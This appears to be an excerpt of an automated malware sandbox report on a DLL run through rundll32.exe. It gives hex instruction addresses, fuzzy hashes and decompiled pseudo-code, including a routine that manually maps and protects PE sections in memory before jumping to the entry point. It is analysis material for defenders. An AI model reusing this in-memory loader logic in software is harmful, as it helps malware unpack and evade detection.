                                                                                                        0x6e4815e6
                                                                                                        0x6e4815e6
                                                                                                        0x6e4815ea
                                                                                                        0x6e4815f1
                                                                                                        0x6e48164c
                                                                                                        0x6e481651
                                                                                                        0x6e4816a4
                                                                                                        0x6e4816a4
                                                                                                        0x6e4816a8
                                                                                                        0x6e4816ac
                                                                                                        0x6e4814d6
                                                                                                        0x6e4814d9
                                                                                                        0x6e4814de
                                                                                                        0x6e4814e4
                                                                                                        0x6e4814e7
                                                                                                        0x6e4814ee
                                                                                                        0x6e4814f2
                                                                                                        0x6e4814f9
                                                                                                        0x6e481502
                                                                                                        0x6e481506
                                                                                                        0x6e48150a
                                                                                                        0x6e481510
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481510
                                                                                                        0x6e4816b6
                                                                                                        0x6e4816c2
                                                                                                        0x6e4816cd
                                                                                                        0x6e4816d4
                                                                                                        0x6e4816dd
                                                                                                        0x6e4816e7
                                                                                                        0x6e4816e8
                                                                                                        0x6e4816f6
                                                                                                        0x6e4816fb
                                                                                                        0x6e4816fc
                                                                                                        0x6e481709
                                                                                                        0x6e48170e
                                                                                                        0x6e481720
                                                                                                        0x6e481725
                                                                                                        0x6e48172a
                                                                                                        0x6e48173c
                                                                                                        0x6e48174e
                                                                                                        0x6e481753
                                                                                                        0x6e48175e
                                                                                                        0x6e481765
                                                                                                        0x6e48176a
                                                                                                        0x6e481772
                                                                                                        0x6e48177b
                                                                                                        0x6e48177b
                                                                                                        0x6e481787
                                                                                                        0x6e48178e
                                                                                                        0x6e48179a
                                                                                                        0x6e4817a6
                                                                                                        0x6e4817b4
                                                                                                        0x6e4817c5
                                                                                                        0x6e4817cc
                                                                                                        0x6e4817d1
                                                                                                        0x6e4817da
                                                                                                        0x6e4817df
                                                                                                        0x6e4817e1
                                                                                                        0x6e4817e5
                                                                                                        0x6e4817e9
                                                                                                        0x6e4817f6
                                                                                                        0x6e481803
                                                                                                        0x6e481807
                                                                                                        0x6e48181b
                                                                                                        0x6e48181f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481834
                                                                                                        0x6e481836
                                                                                                        0x6e48183e
                                                                                                        0x6e48183b
                                                                                                        0x6e48183b
                                                                                                        0x6e48183b
                                                                                                        0x6e481842
                                                                                                        0x6e481844
                                                                                                        0x6e48184a
                                                                                                        0x6e481850
                                                                                                        0x6e4818ac
                                                                                                        0x6e4818b5
                                                                                                        0x6e4818b9
                                                                                                        0x6e4818c6
                                                                                                        0x6e4818cf
                                                                                                        0x6e4818d4
                                                                                                        0x6e4818d8
                                                                                                        0x6e4818db
                                                                                                        0x6e48193c
                                                                                                        0x6e481952
                                                                                                        0x6e48195d
                                                                                                        0x6e48195e
                                                                                                        0x6e48195f
                                                                                                        0x6e481963
                                                                                                        0x6e481966
                                                                                                        0x6e481be6
                                                                                                        0x6e481be9
                                                                                                        0x6e481be9
                                                                                                        0x00000000
                                                                                                        0x6e481966
                                                                                                        0x6e4818e5
                                                                                                        0x6e4818f5
                                                                                                        0x6e4818fe
                                                                                                        0x6e481907
                                                                                                        0x6e481910
                                                                                                        0x6e481911
                                                                                                        0x6e481912
                                                                                                        0x6e481917
                                                                                                        0x6e48191f
                                                                                                        0x6e481927
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481929
                                                                                                        0x6e481859
                                                                                                        0x6e48185e
                                                                                                        0x6e481862
                                                                                                        0x6e481862
                                                                                                        0x6e481866
                                                                                                        0x6e481869
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48188a
                                                                                                        0x6e48188c
                                                                                                        0x6e481890
                                                                                                        0x6e481892
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481894
                                                                                                        0x6e48189b
                                                                                                        0x6e4818a7
                                                                                                        0x00000000
                                                                                                        0x6e4818a7
                                                                                                        0x6e48186e
                                                                                                        0x00000000
                                                                                                        0x6e48196c
                                                                                                        0x6e48196c
                                                                                                        0x6e48196d
                                                                                                        0x6e48197d
                                                                                                        0x6e481989
                                                                                                        0x6e481992
                                                                                                        0x6e48199b
                                                                                                        0x6e4819a4
                                                                                                        0x00000000
                                                                                                        0x6e4819a4
                                                                                                        0x6e481653
                                                                                                        0x6e481655
                                                                                                        0x6e481657
                                                                                                        0x6e48165c
                                                                                                        0x6e481661
                                                                                                        0x6e481674
                                                                                                        0x6e48168a
                                                                                                        0x6e481693
                                                                                                        0x6e481694
                                                                                                        0x6e481694
                                                                                                        0x6e481696
                                                                                                        0x6e481697
                                                                                                        0x6e48169a
                                                                                                        0x6e48169e
                                                                                                        0x00000000
                                                                                                        0x6e481657
                                                                                                        0x6e4815f3
                                                                                                        0x6e4815fd
                                                                                                        0x6e4815fe
                                                                                                        0x6e4815fe
                                                                                                        0x6e48160b
                                                                                                        0x6e481617
                                                                                                        0x6e481619
                                                                                                        0x6e48161b
                                                                                                        0x6e48161f
                                                                                                        0x6e48162f
                                                                                                        0x6e48162f
                                                                                                        0x6e481636
                                                                                                        0x6e481639
                                                                                                        0x6e48163a
                                                                                                        0x6e48163e
                                                                                                        0x6e481648
                                                                                                        0x00000000
                                                                                                        0x6e481648

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 31df2b1e2c1e0db0d10a87b2025410e42c6550bc536479e0a1079b00beefcb6b
                                                                                                        • Instruction ID: 295092414e4faf118b0ae096606ca3dec8d6e673512e8f67e6fede03cf08e647
                                                                                                        • Opcode Fuzzy Hash: 31df2b1e2c1e0db0d10a87b2025410e42c6550bc536479e0a1079b00beefcb6b
                                                                                                        • Instruction Fuzzy Hash: 3B3238705083458FD724DFB4C890EDBB7E8AF95304F10892FE5A5972A1EB70E949CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E476D0C, Relevance: .0, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E476D0C() {

				 *0x6e48d280 = GetUserNameW;
				 *0x6E48D284 = MessageBoxW;
				 *0x6E48D288 = GetLastError;
				 *0x6E48D28C = CreateFileA;
				 *0x6E48D290 = DebugBreak;
				 *0x6E48D294 = FlushFileBuffers;
				 *0x6E48D298 = FreeEnvironmentStringsA;
				 *0x6E48D29C = GetConsoleOutputCP;
				 *0x6E48D2A0 = GetEnvironmentStrings;
				 *0x6E48D2A4 = GetLocaleInfoA;
				 *0x6E48D2A8 = GetStartupInfoA;
				 *0x6E48D2AC = GetStringTypeA;
				 *0x6E48D2B0 = HeapValidate;
				 *0x6E48D2B4 = IsBadReadPtr;
				 *0x6E48D2B8 = LCMapStringA;
				 *0x6E48D2BC = LoadLibraryA;
				 *0x6E48D2C0 = OutputDebugStringA;
				return 0x6e48d280;
			}



                                                                                                        0x6e476d1d
                                                                                                        0x6e476d25
                                                                                                        0x6e476d28
                                                                                                        0x6e476d37
                                                                                                        0x6e476d3a
                                                                                                        0x6e476d49
                                                                                                        0x6e476d4c
                                                                                                        0x6e476d5b
                                                                                                        0x6e476d5e
                                                                                                        0x6e476d6d
                                                                                                        0x6e476d70
                                                                                                        0x6e476d7f
                                                                                                        0x6e476d82
                                                                                                        0x6e476d91
                                                                                                        0x6e476d94
                                                                                                        0x6e476da3
                                                                                                        0x6e476da6
                                                                                                        0x6e476da9

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2bea2e6354e64ab14aa44fe9b98b011215bbc41045b8b8d44308983a7e8c326c
                                                                                                        • Instruction ID: 33c313b62a0f21567bb20ea0a6ac9a4a78c10b0e0622b5d319071c2e89037bd2
                                                                                                        • Opcode Fuzzy Hash: 2bea2e6354e64ab14aa44fe9b98b011215bbc41045b8b8d44308983a7e8c326c
                                                                                                        • Instruction Fuzzy Hash: FB1102B4905A00CF8788EF29E1948127BF1BF8F314B1181AED9094B3A5D7B4D845EF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E47BB44, Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 65%
                                                                                                        			E6E47BB44(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E47C280(__ecx);
				if(_t1 == 0) {
					_t2 = E6E483064(0x60a28c5c, 0xe96b154c);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}






                                                                                                        0x6e47bb45
                                                                                                        0x6e47bb47
                                                                                                        0x6e47bb4e
                                                                                                        0x6e47bb5a
                                                                                                        0x6e47bb61
                                                                                                        0x6e47bb63
                                                                                                        0x6e47bb65
                                                                                                        0x6e47bb66
                                                                                                        0x6e47bb66
                                                                                                        0x6e47bb67
                                                                                                        0x00000000
                                                                                                        0x6e47bb67
                                                                                                        0x6e47bb6e

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                        • Instruction ID: cddb87aa96b412fabb43dc9e8ed8d7197d3c4d4dc6bc6cb68f22c3f59c236921
                                                                                                        • Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                        • Instruction Fuzzy Hash: 7FD0123580020635EF641AF5B810F959BA95F81298F640C2BED006B95DFFB5D46145A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Analysis Process: rundll32.exe PID: 6496 Parent PID: 6380 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 005B11ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E005B11ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0x5b4418 = 1;
				asm("movaps xmm0, [0x5b3010]");
				asm("movups [0x5b4428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E005B2798();
				E005B17A5(_v68,  *_v48, _v52);
				E005B2798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0x5b4418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E005B2798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}































































                                                                                                        0x005b11f9
                                                                                                        0x005b1207
                                                                                                        0x005b120e
                                                                                                        0x005b1211
                                                                                                        0x005b121b
                                                                                                        0x005b1222
                                                                                                        0x005b122c
                                                                                                        0x005b1232
                                                                                                        0x005b123b
                                                                                                        0x005b1244
                                                                                                        0x005b1247
                                                                                                        0x005b124b
                                                                                                        0x005b1253
                                                                                                        0x005b125a
                                                                                                        0x005b125d
                                                                                                        0x005b1260
                                                                                                        0x005b1263
                                                                                                        0x005b1266
                                                                                                        0x005b1280
                                                                                                        0x005b1286
                                                                                                        0x005b1289
                                                                                                        0x005b1291
                                                                                                        0x005b1295
                                                                                                        0x005b1298
                                                                                                        0x005b129b
                                                                                                        0x005b129e
                                                                                                        0x005b12a1
                                                                                                        0x005b12bc
                                                                                                        0x005b12d8
                                                                                                        0x005b12fd
                                                                                                        0x005b12ff
                                                                                                        0x005b1308
                                                                                                        0x005b130b
                                                                                                        0x005b1315
                                                                                                        0x005b1318
                                                                                                        0x005b131b
                                                                                                        0x005b131e
                                                                                                        0x005b1321
                                                                                                        0x005b1535
                                                                                                        0x005b1535
                                                                                                        0x005b143f
                                                                                                        0x005b1445
                                                                                                        0x005b140d
                                                                                                        0x005b1413
                                                                                                        0x005b146c
                                                                                                        0x005b1472
                                                                                                        0x005b1484
                                                                                                        0x005b1487
                                                                                                        0x005b1495
                                                                                                        0x005b14a6
                                                                                                        0x005b14cf
                                                                                                        0x005b14d2
                                                                                                        0x005b14d6
                                                                                                        0x005b14da
                                                                                                        0x005b14e1
                                                                                                        0x005b14e7
                                                                                                        0x005b14e9
                                                                                                        0x005b14f2
                                                                                                        0x005b1503
                                                                                                        0x005b1509
                                                                                                        0x005b150f
                                                                                                        0x005b1515
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x005b151b
                                                                                                        0x005b146c
                                                                                                        0x005b13b8
                                                                                                        0x005b13c6
                                                                                                        0x005b13ce
                                                                                                        0x005b13d1
                                                                                                        0x005b13d3
                                                                                                        0x005b13d9
                                                                                                        0x005b13e5
                                                                                                        0x005b13eb
                                                                                                        0x005b13f1
                                                                                                        0x005b13f4
                                                                                                        0x005b132c
                                                                                                        0x005b133c
                                                                                                        0x005b1342
                                                                                                        0x005b1348
                                                                                                        0x005b134e
                                                                                                        0x005b1354
                                                                                                        0x005b135a
                                                                                                        0x005b1360
                                                                                                        0x005b1363
                                                                                                        0x005b1366
                                                                                                        0x005b136e
                                                                                                        0x005b1376
                                                                                                        0x005b1379
                                                                                                        0x005b137c
                                                                                                        0x005b137f
                                                                                                        0x005b1382
                                                                                                        0x005b138d
                                                                                                        0x005b1429
                                                                                                        0x005b142f
                                                                                                        0x005b142f
                                                                                                        0x005b1466
                                                                                                        0x005b13fa
                                                                                                        0x005b13b0
                                                                                                        0x00000000
                                                                                                        0x005b13b0

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.766843754.00000000005B0000.00000040.00000010.sdmp, Offset: 005B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: fcc0be0ba3e304c4d561b24e325a534f1be55a22126531c9f54c97b5cead03c0
                                                                                                        • Instruction ID: bd2f4591c9279cb418aa95b67b5c9c0cc5c4dd682fa12506688a3c8489c4d7df
                                                                                                        • Opcode Fuzzy Hash: fcc0be0ba3e304c4d561b24e325a534f1be55a22126531c9f54c97b5cead03c0
                                                                                                        • Instruction Fuzzy Hash: 0DB1BCB4D006188FCB54CF68C980A9DFBF0FF88314F6585AAE949AB351D730A985CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 005B1D08, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.766843754.00000000005B0000.00000040.00000010.sdmp, Offset: 005B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction ID: 0f80f0551868be49f17de5ebe6af4e6b512bb5176edfe887eff4b8bdb385cf9a
                                                                                                        • Opcode Fuzzy Hash: ebd0c503d5d06981eae4345ed31fc94b0070bc921ad0fa6b450d87fa158e52e2
                                                                                                        • Instruction Fuzzy Hash: 8F4104B5E0561A9FDB48CF98D494AAEBBF0FF88310F15852DE849AB340D375A840CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 6484 Parent PID: 6376 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 032811ED, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E032811ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t137;
				int _t143;
				int _t151;
				int _t155;
				int _t182;
				unsigned int _t199;
				intOrPtr _t221;
				intOrPtr _t223;
				void* _t231;
				intOrPtr _t234;
				void* _t241;
				intOrPtr _t245;
				intOrPtr _t252;
				DWORD* _t265;
				void* _t269;
				intOrPtr* _t272;
				intOrPtr* _t273;

				_t137 = _a4;
				_v44 = 0;
				_t241 =  *((intOrPtr*)(_t137 + 0x38));
				 *0x3284418 = 1;
				asm("movaps xmm0, [0x3283010]");
				asm("movups [0x3284428], xmm0");
				_v48 = _t137;
				_v52 =  *((intOrPtr*)(_t137 + 0x20));
				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
				_v188 = _t241;
				_v184 =  *((intOrPtr*)(_t137 + 0x18));
				_v180 = 4;
				_v176 =  &_v44;
				_v60 =  *((intOrPtr*)(_v48 + 0xc));
				_v64 = 4;
				_v68 = _t241;
				_v72 =  &_v44;
				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
				_v76 = _t143;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x18));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v44;
				_v92 = 0;
				E03282798();
				E032817A5(_v68,  *_v48, _v52);
				E03282798( *_v48, 0, _v52);
				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t272 = _t269 - 0x8c;
				_t231 = _v68;
				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
				_v96 = _t151;
				_v100 = _v68 + 0x3c;
				_v104 = _t231;
				_v108 = _t252;
				if(_t252 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v104;
				if(_v60 != 0) {
					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					_v152 = 0;
					while(1) {
						_t221 = _v148;
						_t199 =  *(_t221 + 0x24);
						_v156 = _v152;
						_v160 = _t199 >> 0x0000001e & 0x00000001;
						_v164 = _t199 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
						_v184 =  *((intOrPtr*)(_t221 + 8));
						_v180 =  *((intOrPtr*)(0x3284418 + (_v160 << 4) + (_v164 << 3) + ((_t199 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v44;
						_v168 = _t221;
						_t182 = VirtualProtect(??, ??, ??, ??); // executed
						_t272 = _t272 - 0x10;
						_t223 = _v156 + 1;
						_v172 = _t182;
						_v148 = _v168 + 0x28;
						_v152 = _t223;
						if(_t223 == _v60) {
							goto L5;
						}
					}
				}
				L5:
				 *_t272 = _v68;
				_v116 = _v68 +  *((intOrPtr*)(_v48 + 0x14));
				_t155 = DisableThreadLibraryCalls(??);
				_t273 = _t272 - 4;
				_t234 =  *_v100;
				_v140 = _t155;
				_v136 = _t234;
				_v112 = _v68;
				if(_t234 == 0) {
					L2:
					_t245 = _v48;
					_v40 =  *((intOrPtr*)(_t245 + 0x34));
					_v36 =  *((intOrPtr*)(_t245 + 8));
					_v32 =  *((intOrPtr*)(_t245 + 0x30));
					_v28 =  *((intOrPtr*)(_t245 + 0x28));
					_v24 =  *((intOrPtr*)(_t245 + 0x50));
					_v20 = _v116;
					 *_t273 = _t245;
					_v188 = 0;
					_v184 = 0x74;
					_v120 =  &_v40;
					_v124 = 0;
					_v128 = 0x74;
					_v132 =  *((intOrPtr*)(_v112 + 0x28));
					E03282798();
					if(_v132 != 0) {
						_t272 =  *((intOrPtr*)( &_v40 + 0x10));
						goto __eax;
					}
					return 1;
				} else {
					_v112 = _v68 + (_v136 + 0x0000ffff & 0x0000ffff) + 1;
					goto L2;
				}
			}































































                                                                                                        0x032811f9
                                                                                                        0x03281207
                                                                                                        0x0328120e
                                                                                                        0x03281211
                                                                                                        0x0328121b
                                                                                                        0x03281222
                                                                                                        0x0328122c
                                                                                                        0x03281232
                                                                                                        0x0328123b
                                                                                                        0x03281244
                                                                                                        0x03281247
                                                                                                        0x0328124b
                                                                                                        0x03281253
                                                                                                        0x0328125a
                                                                                                        0x0328125d
                                                                                                        0x03281260
                                                                                                        0x03281263
                                                                                                        0x03281266
                                                                                                        0x03281280
                                                                                                        0x03281286
                                                                                                        0x03281289
                                                                                                        0x03281291
                                                                                                        0x03281295
                                                                                                        0x03281298
                                                                                                        0x0328129b
                                                                                                        0x0328129e
                                                                                                        0x032812a1
                                                                                                        0x032812bc
                                                                                                        0x032812d8
                                                                                                        0x032812fd
                                                                                                        0x032812ff
                                                                                                        0x03281308
                                                                                                        0x0328130b
                                                                                                        0x03281315
                                                                                                        0x03281318
                                                                                                        0x0328131b
                                                                                                        0x0328131e
                                                                                                        0x03281321
                                                                                                        0x03281535
                                                                                                        0x03281535
                                                                                                        0x0328143f
                                                                                                        0x03281445
                                                                                                        0x0328140d
                                                                                                        0x03281413
                                                                                                        0x0328146c
                                                                                                        0x03281472
                                                                                                        0x03281484
                                                                                                        0x03281487
                                                                                                        0x03281495
                                                                                                        0x032814a6
                                                                                                        0x032814cf
                                                                                                        0x032814d2
                                                                                                        0x032814d6
                                                                                                        0x032814da
                                                                                                        0x032814e1
                                                                                                        0x032814e7
                                                                                                        0x032814e9
                                                                                                        0x032814f2
                                                                                                        0x03281503
                                                                                                        0x03281509
                                                                                                        0x0328150f
                                                                                                        0x03281515
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0328151b
                                                                                                        0x0328146c
                                                                                                        0x032813b8
                                                                                                        0x032813c6
                                                                                                        0x032813ce
                                                                                                        0x032813d1
                                                                                                        0x032813d3
                                                                                                        0x032813d9
                                                                                                        0x032813e5
                                                                                                        0x032813eb
                                                                                                        0x032813f1
                                                                                                        0x032813f4
                                                                                                        0x0328132c
                                                                                                        0x0328133c
                                                                                                        0x03281342
                                                                                                        0x03281348
                                                                                                        0x0328134e
                                                                                                        0x03281354
                                                                                                        0x0328135a
                                                                                                        0x03281360
                                                                                                        0x03281363
                                                                                                        0x03281366
                                                                                                        0x0328136e
                                                                                                        0x03281376
                                                                                                        0x03281379
                                                                                                        0x0328137c
                                                                                                        0x0328137f
                                                                                                        0x03281382
                                                                                                        0x0328138d
                                                                                                        0x03281429
                                                                                                        0x0328142f
                                                                                                        0x0328142f
                                                                                                        0x03281466
                                                                                                        0x032813fa
                                                                                                        0x032813b0
                                                                                                        0x00000000
                                                                                                        0x032813b0

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.830104608.0000000003280000.00000040.00000010.sdmp, Offset: 03280000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: t
                                                                                                        • API String ID: 544645111-2238339752
                                                                                                        • Opcode ID: 48f53fb3378a577c5bf3fab0995a63ba5b2becd6ac647210b5b50ca1fdddc41b
                                                                                                        • Instruction ID: ce976a3004ee8214a1c0d846a55523c4eae9d222897a7905bd5cd9aa55245eab
